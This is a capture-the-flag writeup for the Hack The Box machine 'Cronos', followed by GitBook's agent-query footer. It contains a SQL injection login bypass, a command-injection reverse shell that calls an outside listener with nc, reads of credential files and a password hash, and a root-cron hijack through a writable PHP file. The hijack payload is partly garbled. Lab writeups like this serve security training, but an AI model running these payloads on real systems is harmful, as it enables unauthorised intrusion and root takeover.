> For the complete documentation index, see [llms.txt](https://jackmeister.gitbook.io/zctf-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jackmeister.gitbook.io/zctf-writeups/hack-the-box/linux/cronos.md). # Cronos ### Port Scanning ```bash naabu -host cronos.htb __ ___ ___ ___ _/ / __ __ / _ \/ _ \/ _ \/ _ \/ // / /_//_/\_,_/\_,_/_.__/\_,_/ v2.0.5 projectdiscovery.io Use with caution. You are responsible for your actions Developers assume no liability and are not responsible for any misuse or damage. [INF] Running CONNECT scan with non root privileges [INF] Found 3 ports on host cronos.htb (10.10.10.13) cronos.htb:53 cronos.htb:80 cronos.htb:22 ``` **Open ports** * port 53 DNS * port 80 http default apache page * port 22 SSH ### Checking for DNS Zone Transfer ```bash dig axfr cronos.htb @10.10.10.13 ; <<>> DiG 9.18.8-1-Debian <<>> axfr cronos.htb @10.10.10.13 ;; global options: +cmd cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 cronos.htb. 604800 IN NS ns1.cronos.htb. cronos.htb. 604800 IN A 10.10.10.13 admin.cronos.htb. 604800 IN A 10.10.10.13 ns1.cronos.htb. 604800 IN A 10.10.10.13 www.cronos.htb. 604800 IN A 10.10.10.13 cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 ;; Query time: 35 msec ;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP) ;; WHEN: Fri Aug 25 02:35:57 +08 2023 ;; XFR size: 7 records (messages 1, bytes 203) ``` **New subdomain** ```bash admin.cronos.htb echo admin.cronos.htb 10.10.10.13 >> /etc/hosts ``` ### Foothold **Webpage login page vulnerable to SQL injection** `admin.cronos.htb` ```sql 'OR 1 OR' ``` After successfully login , command execute is found to be allowed ```bash 8.8.8.8;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.27 4567 >/tmp/f ``` * input `;` and reverse shell follows after that Config file is presented in current directory ```bash cat config.php ``` looking for user with home ```bash cat /etc/passwd | grep home syslog:x:104:108::/home/syslog:/bin/false noulis:x:1000:1000:Noulis Panoulis,,,:/home/noulis:/bin/bash ``` looking at the database ```sql mysql -u admin -p admin select * from users; +----+----------+----------------------------------+ | id | username | password | +----+----------+----------------------------------+ | 1 | admin | 4f5fffa7b2340178a716e3832451e058 | +----+----------+----------------------------------+ ``` ssh attempt unsuccessful ```bash ssh noulis@cronos.htb The authenticity of host 'cronos.htb (10.10.10.13)' can't be established. ED25519 key fingerprint is SHA256:0QcWAcBsE48rtLkfUydRF2HmC1YqGFnb3VuTC0hLSK0. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'cronos.htb' (ED25519) to the list of known hosts. noulis@cronos.htb's password: Permission denied, please try again. noulis@cronos.htb's password: ``` ### Priv Esc cronjobs as found to be run as root ```bash cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1 ``` artisan file is a php file and we have read and write access ```bash -rwxr-xr-x 1 www-data www-data 1646 Apr 9 2017 artisan ``` ```bash www-data@cronos:/var/www/laravel$ cat artisan #!/usr/bin/env php &3 2>&3"); /* ``` Open listener and wait for connection for root shell ```bash nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.14.27] from (UNKNOWN) [10.10.10.13] 54116 ls root.txt whoami root ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jackmeister.gitbook.io/zctf-writeups/hack-the-box/linux/cronos.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.